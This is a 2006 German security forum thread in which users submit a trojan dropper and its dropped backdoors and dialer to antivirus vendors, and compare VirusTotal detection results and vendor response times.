Panda 9.0.0.4 05.06.2006 Bck/Gerzidan.A
Sophos 4.05.0 05.07.2006 Troj/Mdrop-UO
Symantec 8.0 05.07.2006 no virus found
TheHacker 5.9.7.139 05.05.2006 Trojan/Dropper.MultiJoiner.13.j
UNA 1.83 05.06.2006 TrojanDropper.Win32.MultiJoiner.13
VBA32 3.11.0 05.06.2006 Trojan-Dropper.Win32.MultiJoiner.13.j

[Voyager]

Symantec 8.0 05.07.2006 no virus found

http://www.rokop-security.de/index.php?sho...ndpost&p=146724

hierran kann man bestimmt erkennen das Norton nicht gleich Symantec ist .

[Gast_rock_*]

hmm...ist das gleich? oder wie? wie heist den der scanner...ist doch dr.norton von symantec...(oder steh ich am schlauch?)

welche versionsnummer hat der scanenr im ganzen .... ich hab auf der symantecseite ein liveupdate, 6.mai gesehen bei den aktuellen beschreibungen...

multijioner dürfte es auf den ersten eintrag nicht finden/anzeigen.

[Voyager]

hmm...ist das gleich?

Nicht ganz.

wie heist den der scanner...ist doch dr.norton von symantec

NIS2006

...(oder steh ich am schlauch?)

jap

multijioner dürfte es auf den ersten eintrag nicht finden/anzeigen.

doch tut er hier aber , das ganze ding heisst Bild-Dieter__JPG.com und wird als Hacktool.Exebind erkannt.

[Gast_rock_*]

doch tut er hier aber , das ganze ding heisst Bild-Dieter__JPG.com und wird als Hacktool.Exebind erkannt.
[right][snapback]147139[/snapback][/right]

hmmm...dann stimmts...

was ist dann dieses symantec 8 engine welches bei virsutotal verwendet wird?

ich glaub es war ja nicht das erste mal das du was bestätigen konntest...was beim hochladen nicht gefunden wird.

[Stefan]

so , also....ich habs dann auf alle arten und möglichkeiten geschickt...auch mit cryptoprogrammen...aber mc afee wollen es nicht um die burg annehmen...wenn es kein stinknormaler verschlüsselter zipordner ist der das eigene passwort infected haben muss.
[right][snapback]147118[/snapback][/right]

Ich weiß nicht, warum du solche Schwierigkeiten damit hast, denen ein stinknormales passwortgeschütztes Zip-File zu schicken.

Ich habe denen jetzt mal das File hochgeladen:



Das hat übrigens mit IZArc ganz hervorragend funktioniert.

[Gast_rock_*]

nanu...wo kann man bei mc afee hochladen?

ja...die packprogramme schau ich mir schon ne weile an...aber sieht alles so kompliziert und vielseitig aus.... ob dat gut geht... runtergeladen hab ich auch schon einiges...aber weis nicht sorecht..

[Stefan]

nanu...wo kann man bei mc afee hochladen?
[right][snapback]147153[/snapback][/right]

Hier.

[Gast_rock_*]

boah!...da muss man ja ein buch schreiben....und foto wird keins benötigt??

naja...dann lieber packer weitersuchen....

[Stefan]

So, eine Antwort hat es schonmal von McAfee gegeben:

A.V.E.R.T. Sample Analysis
Issue Number: 2352184
Virus Research Engineer: Babu Nath Giri
Identified: BackDoor-COC.dr

AVERT™ Labs, Bangalore.

Thank you for submitting your suspicious file.

Synopsis -

Attached is a file for extra detection(with 4.4.00 engine), which will be in-cluded in a future DAT set.

Warten wir mal ab, wann die Taten folgen.

Der Beitrag wurde von Stefan bearbeitet: 08.05.2006, 18:54

[Gast_rock_*]

hmm...stand da nicht was von Multidropper NB oder MB?....

müsste am ende der mail sein von mc afee

[Stefan]

Nö.
Einzige Bezeichnung = siehe Fettgedrucktes oben.

[Gast_rock_*]

na abarten....bin auf arbeit....kann mich nur erinnern.....das eigenlich so einigermaßen das slebe wie bei dir stand...nur andere bearbeiter von mc afee...

und ganz am ende bevor die mail aus ist....kommt linksbündig nochmals das wort Multidropper MB oder eben NB vor.

ja werden wir eh sehen...

ich hab die mail aber schon gelöscht daheim...bin aber 100% sicher das dieses wort am ende vorkam!

die "normalsterblichen" bekommen immer mittwochs/donnerstag morgen die ups...also sollte es diese woche ncoh eingebaut sein!

dann kann ichs ja nochmal prüfen...oder wir laden mal hoch... :=

[Gast_rock_*]

@ stef, and interests...

hmm..also bevor ich ins bett geh....also...mei mail schaut da irgendwie nur ein bissl wenig ähnlich aus:

Hi,
Thanks for uploading the file(s):
I've included it under

;---------------------------------
(799) backdoor.log
;---------------------------------
(154.388) DAN6.exe
(144.678) DANZ6.exe
(144.678) DC.exe
(24.576) INT.exe
BackDoor-COC
;---------------------------------
(314.129) multijoiner.exe
(289.518 )6-DATEI.exe
(178.996) da6.exe
(49.183) in.exe
replacement "MultiDropper-NB"
;---------------------------------
(82.008) foto.exe
;---------------------------------

regards,
xxxnamexxx
McAfee Avert
_______________________

[Gast_rock_*]

so...update ist da...erkennung OK!

MultiDropper-NB

best wishes
rock

[Gast_rock_*]

übrigens...stefan...hast du Bitdefender was geschickt??

AntiVir 6.34.1.27 05.10.2006 TR/Drop.MultiJoiner.13.J.5
Avast 4.6.695.0 05.08.2006 Win32:Trojan-gen. {VC}
AVG 386 05.09.2006 Dropper.Generic.EFW
BitDefender 7.2 05.10.2006 no virus found
CAT-QuickHeal 8.00 05.09.2006 no virus found
ClamAV devel-20060426 05.10.2006 Trojan.Dropper.Small-51
DrWeb 4.33 05.10.2006 Trojan.MulDrop.3684
eTrust-InoculateIT 23.72.4 05.10.2006 no virus found
eTrust-Vet 12.4.2203 05.10.2006 no virus found
Ewido 3.5 05.10.2006 Dropper.MultiJoiner.13.j
Fortinet 2.76.0.0 05.10.2006 W32/MultiJoiner.J!tr
F-Prot 3.16c 05.09.2006 destructive program named W32/Trojan.BEN
Ikarus 0.2.65.0 05.09.2006 Trojan-Dropper.Win32.MultiJoiner.13.J
Kaspersky 4.0.2.24 05.10.2006 Trojan-Dropper.Win32.MultiJoiner.13.j
McAfee 4758 05.09.2006 MultiDropper-NB
Microsoft 1.1372 05.10.2006 no virus found
NOD32v2 1.1528 05.09.2006 Win32/TrojanDropper.Agent.AGE
Norman 5.90.17 05.10.2006 W32/Multijoiner.C
Panda 9.0.0.4 05.09.2006 Bck/Gerzidan.A
Sophos 4.05.0 05.10.2006 Troj/Mdrop-UO
Symantec 8.0 05.10.2006 no virus found
TheHacker 5.9.7.140 05.08.2006 Trojan/Dropper.MultiJoiner.13.j
UNA 1.83 05.06.2006 TrojanDropper.Win32.MultiJoiner.13
VBA32 3.11.0 05.09.2006 Trojan-Dropper.Win32.MultiJoiner.13.j


eTrust hat's bereits von mir heute erhalten...

[Gast_rock_*]

das ist aber seltsam...eTrust kennt es ja eh zu kennen....schreibt sogar autom. zurück als was es gelistet ist...ganz drunter schreibts aber erst wieder das sie informieren wenn sie es einpflegen...

FILE
------------------------------------------------------------------------
Multidropper!.com
------------------------------------------------------------------------
The Windows PE (I386,EXE) file "Multidropper!.com" has been determined
to be malicious.

Aliases reported by other AV products are listed here:
(Trojan-Dropper.Win32.MultiJoiner.13.j) (MultiDropper-NB)
(Hacktool.Exebind)
CA antivirus products address this malware as follows:
------------------------------------------------------
eTrust Antivirus 6.x/v7 (Vet Engine)

We will inform you by email ASAP when we have a signature update
available providing detection.

[Domino]

Erkennen und eine Signatur erstellen ist etwas anderes als "in den veröffentlichten Signaturen enthalten".


Domino

[Stefan]

übrigens...stefan...hast du Bitdefender was geschickt??
[...]
BitDefender 7.2 05.10.2006  no virus found
[...]
[right][snapback]148048[/snapback][/right]

Ja @rock, schon 3 mal.
Ich habe es aufgegeben und werde es mir bis Anfang nächsten Jahres merken. Da läuft nämlich die Lizenz ab und wird dann wohl nicht mehr erneuert.

Der Beitrag wurde von Stefan bearbeitet: 10.05.2006, 22:10

[Gast_rock_*]

eTrust = Win32/MultiDropper

[Gast_rock_*]

alles geht heut verdammt schnell...absendungen werden raqsch beantwortet...eTrust hat es auch bereits BEIDEN engines eingepflanzt...

STATUS: FINISHEDComplete scanning result of "Multidropper_.com", received in VirusTotal at 05.11.2006, 08:31:24 (CET).

Antivirus Version Update Result
AntiVir 6.34.1.27 05.10.2006 TR/Drop.MultiJoiner.13.J.5
Avast 4.6.695.0 05.10.2006 Win32:Trojan-gen. {VC}
AVG 386 05.10.2006 Dropper.Generic.EFW
BitDefender 7.2 05.11.2006 no virus found
CAT-QuickHeal 8.00 05.11.2006 no virus found
ClamAV devel-20060426 05.11.2006 Trojan.Dropper.Small-51
DrWeb 4.33 05.10.2006 Trojan.MulDrop.3684
eTrust-InoculateIT 23.72.5 05.11.2006 Win32/MultiDropper.OK!Trojan
eTrust-Vet 12.4.2205 05.11.2006 Win32/Multidropper.AG
Ewido 3.5 05.10.2006 Dropper.MultiJoiner.13.j
Fortinet 2.76.0.0 05.11.2006 W32/MultiJoiner.J!tr
F-Prot 3.16c 05.11.2006 destructive program named W32/Trojan.BEN
Ikarus 0.2.65.0 05.10.2006 Trojan-Dropper.Win32.MultiJoiner.13.J
Kaspersky 4.0.2.24 05.11.2006 Trojan-Dropper.Win32.MultiJoiner.13.j
McAfee 4759 05.10.2006 MultiDropper-NB
Microsoft 1.1372 05.11.2006 no virus found
NOD32v2 1.1530 05.10.2006 Win32/TrojanDropper.Agent.AGE
Norman 5.90.17 05.10.2006 W32/Multijoiner.C
Panda 9.0.0.4 05.10.2006 Bck/Gerzidan.A
Sophos 4.05.0 05.11.2006 Troj/Mdrop-UO
Symantec 8.0 05.11.2006 no virus found
TheHacker 5.9.7.141 05.10.2006 Trojan/Dropper.MultiJoiner.13.j
UNA 1.83 05.10.2006 TrojanDropper.Win32.MultiJoiner.13
VBA32 3.11.0 05.10.2006 Trojan-Dropper.Win32.MultiJoiner.13.j

bitdefedner bekam nebst absendung nochmals, über den feedback ne anfrage ob da eh nachgeschaut wird einmal - bald ist eh nur bit der einzige der davon nix weis...sofort rückantwort das sie sich ums sample kümmern....

rav hats auch bekommen (ich hoff es betrifft i.d. fall Microsoft), quick auch....und beid er gelgenenheit verteil ich noc ein paar exoten an "nichtsfinder" wie ad aware oder ikarus!

...dann geh ich in die kuschi kuschi dekce!

rock

[Gast_rock_*]

hmm...hab den Multidropper mal gestartet. es droppen drei programme. dc.exe, int.exe, und vgt.exe.

die ersten beiden dateien int.exe und dc.ecewerden von mc afee als backoor coc gemeldet...die vgt.exe ist ein DIALER! und schau her...den erkennt kaum jemand!

ist das stark!

STATUS: FINISHEDComplete scanning result of "vgt.exe", received in VirusTotal at 05.11.2006, 09:30:43 (CET).

Antivirus Version Update Result
AntiVir 6.34.1.27 05.11.2006 DIAL/302327
Avast 4.6.695.0 05.10.2006 Win32:Trojan-gen. {UPX!}
AVG 386 05.10.2006 Dialer.BDK
BitDefender 7.2 05.11.2006 Trojan.Dialer.OE
CAT-QuickHeal 8.00 05.11.2006 no virus found
ClamAV devel-20060426 05.11.2006 Dialer-602
DrWeb 4.33 05.11.2006 no virus found
eTrust-InoculateIT 23.72.5 05.11.2006 no virus found
eTrust-Vet 12.4.2205 05.11.2006 no virus found
Ewido 3.5 05.10.2006 Trojan.Dialer.oe
Fortinet 2.76.0.0 05.11.2006 W32/Dialer.OE!tr
F-Prot 3.16c 05.11.2006 no virus found
Ikarus 0.2.65.0 05.10.2006 no virus found
Kaspersky 4.0.2.24 05.11.2006 Trojan.Win32.Dialer.oe
McAfee 4759 05.10.2006 no virus found
Microsoft 1.1372 05.11.2006 no virus found
NOD32v2 1.1531 05.11.2006 no virus found Norman 5.90.17 05.10.2006 W32/Dialer.ITR
Panda 9.0.0.4 05.10.2006 Suspicious file
Sophos 4.05.0 05.11.2006 no virus found
Symantec 8.0 05.11.2006 no virus found
TheHacker 5.9.7.141 05.10.2006 no virus found UNA 1.83 05.10.2006 Trojan.Win32.Dialer
VBA32 3.11.0 05.10.2006 Trojan.Win32.Dialer.oe

also bei mc afee würd ich alt auschauen wenn ich was falsch mach...den dialer lässt er mir in der packung drinnen....wenn ich den ersten alarm ignoriere...weil ich ja denke es ist bloß der dropper....

lustiges spiel!

[Gast_rock_*]

aber stefan...bitdefender findet wenigstens eine der drei schadhaften dropps ....
BitDefender 7.2 05.11.2006 Trojan.Dialer.OE is ja schon mal was...



Der Beitrag wurde von rock bearbeitet: 11.05.2006, 08:49

[Stefan]

Ist jetzt nur die Frage, ob es sich bei der nichtvorhandenen Reaktion auf den Dropper um einen Einzelfall handelt, oder nicht.
Letzteres würde dann ja fast schon das schlechte Abschneiden beim letzten Test von AV-Comparatives erklären.

Der Beitrag wurde von Stefan bearbeitet: 11.05.2006, 08:56

[Gast_rock_*]

ich möcht ja auf das hinauf garnicht wissen...wievielen scanner es so geht...

der unterschied bei dem einen dropper ist ja schon schlimm genug...
aber in dem fall würde ich dir mac afee und bitdefender empfehlen.

mc afee erkennt den dropper und 2 der backdoor exen...und bit die was mc nicht kannte aus dem ordner!

wird so eine sch* im labor wo mans hinschickt nicht wirklich korrekt gecheckt. was soll das eigentlich die primäre hauptdatei zu deklarieren, aber die malware die es droppt...die kemma nimmer...SUPER!

[Gast_rock_*]

sophos ist ganz ein schlauer...meldet mir zurück was er ohnehin schon kannte...ausführen und droppen lassen tuns den wohl in england a net!

naja...egal...

bitdefender schreibt wenigtens schon mal:
vielen Dank für Ihre Nachricht. Wir haben die Datei an unser Virenlabor
weitergeleitet.

mal sehen....

so, für mich erledigt...alle looser haben es nochmal bekommen...ob sie es entpacken und ausführen und somit die anderen backdoors und dialer drinnen finden oder nicht...ist ihr kafee...eventuell wollens scheinbar garnicht...

wenns eh "uns" gibt die es schäufchenweise bringen....

[Kyu]

Hallo =)

mein Erfahrungsbericht dazu.

-Datei um 10.45Uhr aufgetaucht
-Bisschen getestet und festgestellt das bei Aktivierung drei Trojaner nachgeladen werden (Trojan.Dropper.Agent.AAY, Trojan.QHosts.P und Trojan.AVKill.J) und alle drei von BitDefender erkannt werden
-Datei um 12.03Uhr eingesandt (support@bitdefender.de)
-Um 13.52Uhr von BitDefender ne Antwort bekommen:

...vielen Dank für Ihre Nachricht und die Einsendung der Datei.
Die Datei ist tatsächlich ein Virus und wird innerhalb der nächsten zwei Stunden als "Trojan.Dropper.Multijoiner.J" durch ein Update bekannt gemacht....

Wie es zum unterschiedlichen Umgang in der Reaktion und Reaktionszeit gekommen ist, k.A. Kann jeder selbst darüber spekulieren, aber wichtig ist für mich im Endeffekt nur das sich der Support schnell und korrekt bei mir gemeldet hat.

@Stefan, vielleicht klappts ja bei dir beim nächsten mal auch besser =)

[Stefan]

Wie es zum unterschiedlichen Umgang in der Reaktion und Reaktionszeit gekommen ist, k.A. Kann jeder selbst darüber spekulieren, aber wichtig ist für mich im Endeffekt nur das sich der Support schnell und korrekt bei mir gemeldet hat.
[...]
@Stefan, vielleicht klappts ja bei dir beim nächsten mal auch besser =)
[right][snapback]148423[/snapback][/right]

Vielleicht sollte ich die Dateien in Zukunft auch wieder an support... und nicht an virussubmit... schicken.
Aber wer weiß, vielleicht stehe ich ja bei denen auf 'ner Art schwarzen Liste. Von wegen, zu viele Einsendungen und so.
Obwohl ich mir in Zukunft wohl eher schenken werde, denen noch Samples zukommen zu lassen. Denn mein F-Secure erkennt die Schädlinge ja dank der guten Arbeit bei Kaspersky Labs meistens frühzeitig. In diesem Fall hier, wären es dann so ca. knapp 2 Monate eher.

Bitdefender läuft halt noch auf einem von mir betreuten Rechner und da ich die jährliche Lizenz spendiere, werde ich mich dann wohl, nach deren Ablauf, für ein anderes Produkt entscheiden.

Der Beitrag wurde von Stefan bearbeitet: 11.05.2006, 15:57

[Gast_rock_*]

morgen..

hab mir in der früh noch die mühe gemacht...den herstellern (einigen) zu schreiben...ob sie den Multidropper net ein bissl ankjlicken möchten...was dann passiert....ob da nix droppt oder so...

na da meldet sich doch gleich mal vet, inoculate, sophos, der ungarische hersteller...virusbuster...usw...


Troj/Dialer-DL

Win32/SilentCaller.S dropper

BAT/AVKiller.X trojan

so...jetzt mag i nimmer....die anderen belassen es wohl nur beim dropper....



bitdefender antwort fehlt leider noch....

Der Beitrag wurde von rock bearbeitet: 11.05.2006, 16:06

[Stefan]

bitdefender antwort fehlt leider noch....
[right][snapback]148444[/snapback][/right]

Du bist bestimmt mit mir auf der Schwarzen Liste.

[Rios]

Also ich finde es schade wie Bitdefender hier verweilt. Entweder wissen die nicht mehr wo ihnen der Kopf steht, bzw. gibt es evtl. Personal Probleme, aber auf schon vogekautes Futter zu verzichten finde ich dessen nicht würdig. Bin trotzdem noch ein alter Bitdefender Fan, aber die wenn sie so weiter verfahren, gehen den falschen Weg.

[Stefan]

Anscheinend hat der Bitdefender-Support sein Wort gehalten:

STATUS: FINISHEDComplete scanning result of "Bild-Dieter__JPG.com", received in VirusTotal at 05.11.2006, 22:25:54 (CET).

Antivirus Version Update Result
AntiVir 6.34.1.27 05.11.2006 TR/Drop.MultiJoiner.13.J.5
Avast 4.6.695.0 05.11.2006 Win32:Trojan-gen. {VC}
AVG 386 05.11.2006 Dropper.Generic.EFW
BitDefender 7.2 05.11.2006 Trojan.Dropper.Multijoiner.J
CAT-QuickHeal 8.00 05.11.2006 no virus found
ClamAV devel-20060426 05.11.2006 Trojan.Dropper.Small-51
DrWeb 4.33 05.11.2006 Trojan.MulDrop.3684
eTrust-InoculateIT 23.72.5 05.11.2006 Win32/MultiDropper.OK!Trojan
eTrust-Vet 12.4.2205 05.11.2006 Win32/Multidropper.AG
Ewido 3.5 05.11.2006 Dropper.MultiJoiner.13.j
Fortinet 2.76.0.0 05.11.2006 W32/MultiJoiner.J!tr
F-Prot 3.16c 05.11.2006 destructive program named W32/Trojan.BEN
Ikarus 0.2.65.0 05.11.2006 Trojan-Dropper.Win32.MultiJoiner.13.J
Kaspersky 4.0.2.24 05.11.2006 Trojan-Dropper.Win32.MultiJoiner.13.j
McAfee 4760 05.11.2006 MultiDropper-NB
Microsoft 1.1372 05.11.2006 no virus found
NOD32v2 1.1531 05.11.2006 Win32/TrojanDropper.Agent.AGE
Norman 5.90.17 05.11.2006 W32/Multijoiner.C
Panda 9.0.0.4 05.11.2006 Bck/Gerzidan.A
Sophos 4.05.0 05.11.2006 Troj/Mdrop-UO
Symantec 8.0 05.11.2006 no virus found
TheHacker 5.9.7.141 05.10.2006 Trojan/Dropper.MultiJoiner.13.j
UNA 1.83 05.11.2006 TrojanDropper.Win32.MultiJoiner.13
VBA32 3.11.0 05.11.2006 Trojan-Dropper.Win32.MultiJoiner.13.j

Mir ist gerade aufgefallen, dass man sich im Hause "eTrust" nicht mal auf eine gleiche Bezeichnung für die zwei verschiedenen Engines einigen konnte.

[Kyu]

awa schwarze liste... die av-hersteller leben doch davon das sie möglichst früh, möglichst viele samples in die finger bekommen. keine ahnung was da wo, wieso schief gelaufen is, aber das is auf jeden fall für die eher dumm gelaufen als für dich.
is auch egal, die sache is ja nu erledigt... aber eine info hängt damit vielleicht zusammen: durch die expansion war ja der support merklich überlastet. auf dem linuxtag kam das thema im gespräch auch auf. bitdefender hat anscheinend nun neuerdings aber wieder genug leute eingestellt um die frühere reaktionszeit gewährleisten zu können. ich persönlich kann mir vorstellen das es am ehesten damit zu tun hat (würde die rasche reaktion heute mittag erklären).
wie auch immer, nach dem spiel ist vor dem spiel... in diesem sinne: wir lesen uns beim nächsten sample =)

[Gast_rock_*]

edit. stimmt....da habens zwei namen in beiden engines...

aber...
denn jetzt ist auch der letzte inhalt indentifiziert:

With regards to the file "vgt.exe" submitted by you on 11 May 17:36:55
(Australian Eastern Standard Time), we have added detection for
Win32/Qdial.7gs!Trojan to the signature files for the InoculateIT
engine.

eTrust! war der einzige der sich an alle samples korrekt geantwortet hat!
AUCH was sich dann droppt natürlich!

Bitdefender hab ich gestern NOCHMAL angeschrieben/angeschickt...dürfe sich aber schon erledigt haben!

fehlt nur noch CAT....(was immer das für'n scanner ist)



Der Beitrag wurde von rock bearbeitet: 12.05.2006, 07:35

[Gast_rock_*]

ähmm..stefan...will dir ja nicht ganz die laune an bitdefender nehmen...aber den alten clicker will man bis heute nicht so recht akzeptieren...

STATUS: FINISHEDComplete scanning result of "Trojan_Clicker.exe", received in VirusTotal at 05.12.2006, 12:17:33 (CET).

Antivirus Version Update Result
AntiVir 6.34.1.27 05.12.2006 ADSPY/AdvertMen.A.5
Avast 4.6.695.0 05.11.2006 Win32:Trojano-CE
AVG 386 05.11.2006 Clicker.CAH
BitDefender 7.2 05.12.2006 no virus found
CAT-QuickHeal 8.00 05.11.2006 no virus found
ClamAV devel-20060426 05.11.2006 no virus found
DrWeb 4.33 05.12.2006 Adware.Advert
eTrust-InoculateIT 23.72.6 05.12.2006 no virus found
eTrust-Vet 12.4.2207 05.12.2006 no virus found
Ewido 3.5 05.12.2006 Hijacker.Agent.hi
Fortinet 2.76.0.0 05.12.2006 Adware/AdvertMen!04
F-Prot 3.16c 05.11.2006 no virus found
Ikarus 0.2.65.0 05.11.2006 no virus found
Kaspersky 4.0.2.24 05.12.2006 not-a-virus:AdWare.Win32.AdvertMen.a
McAfee 4760 05.11.2006 no virus found
Microsoft 1.1372 05.12.2006 no virus found
NOD32v2 1.1533 05.12.2006 no virus found
Norman 5.90.17 05.11.2006 W32/Advertmen.D
Panda 9.0.0.4 05.11.2006 no virus found
Sophos 4.05.0 05.12.2006 no virus found
Symantec 8.0 05.12.2006 no virus found
TheHacker 5.9.7.142 05.12.2006 no virus found
UNA 1.83 05.11.2006 TrojanClicker.Win32.Agent
VBA32 3.11.0 05.11.2006 Trojan-Clicker.Win32.Agent.hi

[Rios]

Hallo Rock,

steht doch schon in deiner Liste auf Nr.6
http://www.quickheal.co.in/

[Heike]

Ich habe aus Fun mal ein paar "alte" RATs getested ( release 2004 ), die fallen offenbar wieder raus. Mal ein Beispiel:

Description:
LogIT is an extremely "lite" standalone offline keylogger program. It has the ability to send the log files after they reach a certain size limit ..

Keylogger installiert, server.exe überprüfen lassen.

AntiVir 6.34.1.27 12.05.2006 TR/Spy.Small.BA.2
Avast 4.6.695.0 12.05.2006 Win32:Keylog-011
AVG 386 12.05.2006 PSW.Small.U
BitDefender 7.2 12.05.2006 Trojan.Spy.Small.BA
CAT-QuickHeal 8.00 12.05.2006 TrojanSpy.Small.ba
ClamAV devel-20060426 12.05.2006 Trojan.Small-95
DrWeb 4.33 12.05.2006 Trojan.Logit.10
eTrust-InoculateIT 23.72.6 12.05.2006  no ha encontrado virus
eTrust-Vet 12.4.2207 12.05.2006 Win32/Logit.10.A
Ewido 3.5 12.05.2006 Logger.Small.ba
Fortinet 2.76.0.0 12.05.2006 W32/Keylog.W!tr
F-Prot 3.16c 11.05.2006 security risk named W32/Logit.A@spy
Ikarus 0.2.65.0 12.05.2006  no ha encontrado virus
Kaspersky 4.0.2.24 12.05.2006 Trojan-Spy.Win32.Small.ba
McAfee 4761 12.05.2006 Keylog-Logit
Microsoft 1.1372 12.05.2006 TrojanSpy:Win32/Small.BA
NOD32v2 1.1534 12.05.2006 Win32/Spy.Small.BA
Norman 5.90.17 12.05.2006 W32/KeyLogger.DU
Panda 9.0.0.4 12.05.2006 Trj/Small.HD
Sophos 4.05.0 12.05.2006 Troj/Keylog-W
Symantec 8.0 12.05.2006 Infostealer
TheHacker 5.9.7.142 12.05.2006 Trojan/Spy.Small.ba
UNA 1.83 11.05.2006  no ha encontrado virus
VBA32 3.11.0 12.05.2006 Trojan-Spy.Win32.Small.ba

Sicherheit zu 100% gibt es nicht.

[Stefan]

ähmm..stefan...will dir ja nicht ganz die laune an bitdefender nehmen...aber den alten clicker will man bis heute nicht so recht akzeptieren...
[right][snapback]148755[/snapback][/right]

Warum sollte mir das die Laune vermiesen?

F-Secure bezieht seine Signaturen u.a. von denen hier:

Kaspersky 4.0.2.24 05.12.2006 not-a-virus:AdWare.Win32.AdvertMen.a

Und wie bereits gesagt, läuft Bitdefender auf dem betreuten Rechner nur noch ein halbes Jahr. Dann ist Schluss mit Lustig.

Obwohl ich mir nicht sicher bin, ob in diesem Fall eine 9.5er Windows-Version von Bitdefender den nicht doch vielleicht erkennt.

Der Beitrag wurde von Stefan bearbeitet: 13.05.2006, 08:05